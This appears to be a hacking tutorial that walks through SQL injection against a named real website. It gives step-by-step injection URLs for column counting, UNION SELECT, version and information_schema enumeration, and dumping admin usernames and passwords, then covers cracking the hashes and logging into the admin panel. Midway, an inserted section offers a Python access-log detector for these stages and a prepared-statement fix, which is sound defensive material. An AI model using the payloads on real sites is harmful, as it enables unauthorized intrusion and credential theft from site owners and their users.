◆Hack Websites Using SQL Injection and Bypass its Admin Panel!
◆No Tools Needed except your Web Browser
◆Hello there. If you are wondering how to hack websites, then this tutorial is for you.
◆You might have already learnt about SQL injection from various blogs, so here I am describing it directly, in a more understandable way.
◆First we have to find a website that is vulnerable to SQL injection.
◆You will find thousands of websites from Google if you use Google dorks.
◆Here I have found a website that is vulnerable to SQL injection.
◆We have to find out whether this website is vulnerable to SQL injection or not.
◆In your web browser type
And execute (execute means click on Go)
If you see
◆You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
◆Then the website is vulnerable to SQL injection and that site can be hacked; if not, then leave that site and choose another.
◆We have found that the above site is vulnerable to SQL injection.
◆Now we have to find the columns in its database.
site.com/page.php?id=-2 order by 10–
◆If you see Unknown columns
◆Then decrease the number until the page loads without any error
http://musculoskeletalsociety.in/page.php?id=-2 order by 10–
◆Error Unknown Columns
◆Then replace 10 with 9, 8, 7, 6, 5, 4...
◆Until the page loads perfectly
◆Here the page loads fine
http://musculoskeletalsociety.in/page.php?id=-2 order by 5–
◆That means it has only 5 columns in its database.
◆Now we have to find its vulnerable column.
◆So here is the SQL command.
◆Now type in your web browser
http://musculoskeletalsociety.in/page.php?id=-2 union select 1,2,3,4,5–
◆You will see numbers between 1 and 5 on the page.
◆I have found 2 on the page, so the 2nd column is vulnerable.
◆Now we have to find its database version and username.
http://musculoskeletalsociety.in/page.php?id=-2 union select 1,@@version,3,4,5–
◆And click on Go. You will find the database version.
◆I have found 5.0 or above.
◆Note: you can replace @@version with version() for the database version, and use @@user or user() for the database user.
◆SQL injection will be easy if the database version is 5.0 or above.
◆If the database version is below 5.0, then we have to guess everything. We will discuss more about it soon.
◆Now we have found its database version.
◆Now type http://musculoskeletalsociety.in/page.php?id=-2 union+select+ 1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()–
◆You will see its tables.
◆Now we want its admin table details.
For that type this command
◆Now you will see its username, password, email, etc. columns.
◆Now we only want the username and password.
◆For that, apply this command.
http://musculoskeletalsociety.in/page.php?id=-2 union+select+1,group_concat(user_id,0x3a,password),3,4,5+from admin–
◆Here admin is the table name which we got from the previous command.
◆Don't be confused: you may find admin_table or tbl_admin or administrator etc. on other websites.
◆Here 0x3a is the hexadecimal value of :
◆By executing the above command you will see its username and password.
◆Note: the password may be encrypted with MD5 or other encryption, so we have to decrypt it.
◆Here is a website to decrypt the hash.
Go to hashkiller.co.uk and decrypt it there.
◆Search for the website's admin panel.
◆You can find it by
◆Etc. Finally, find the admin panel somehow and enter the username and password.
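Seen from the defending side, the requests in the steps above leave a recognisable trail in the web server's access log. The following is an added example, not part of the original tutorial: a Python detector that decodes each logged query string and flags the stages described above (quote probe, ORDER BY column counting, UNION SELECT, version lookup, information_schema enumeration, group_concat dump), then correlates them per client. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Stage name -> pattern, applied to the decoded, lower-cased query string.
STAGES = [
    ("quote_probe",   re.compile(r"=[^&]*'")),
    ("order_by",      re.compile(r"\border\s+by\s+\d+")),
    ("union_select",  re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("version_probe", re.compile(r"@@version|\bversion\s*\(")),
    ("schema_enum",   re.compile(r"\binformation_schema\b")),
    ("concat_dump",   re.compile(r"\bgroup_concat\s*\(")),
]

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*?) HTTP/[\d.]+" \d{3}')

# Constructed sample log (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /page.php?id=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Oct/2023:13:55:09 +0000] "GET /page.php?id=2%27 HTTP/1.1" 500 310',
    '203.0.113.7 - - [10/Oct/2023:13:55:20 +0000] "GET /page.php?id=-2%20order%20by%2010-- HTTP/1.1" 200 912',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /page.php?id=-2+UNION+SELECT+1,2,3,4,5-- HTTP/1.1" 200 4801',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /page.php?id=-2+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables-- HTTP/1.1" 200 5333',
    '198.51.100.4 - - [10/Oct/2023:13:56:30 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 2210',
]

def classify(target):
    """Return the stage names matched by one request target (path?query)."""
    query = unquote_plus(urlsplit(target).query).lower()  # decode %xx and '+'
    return [name for name, pattern in STAGES if pattern.search(query)]

def scan(lines):
    """Return {client_ip: set of stages seen} over access-log lines."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        stages = classify(m.group(2))
        if stages:
            hits.setdefault(m.group(1), set()).update(stages)
    return hits

def alerts(lines, min_stages=2):
    """Report only clients that hit several distinct stages."""
    return {ip: sorted(s) for ip, s in scan(lines).items() if len(s) >= min_stages}

if __name__ == "__main__":
    print(alerts(SAMPLE_LOG))
```

A single stage on its own (an apostrophe in a surname, for example) is weak evidence, which is why `alerts()` requires two or more distinct stages from the same client. The durable fix is in the application: bind `id` as a parameter in a prepared statement and stop sending database error text to the browser.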
◆Here I have presented some automated SQL injection tools for Android
Note: This tutorial is for educational purposes only. We are not responsible for any mistake or misuse by you.
If you have any questions please feel free to ask us.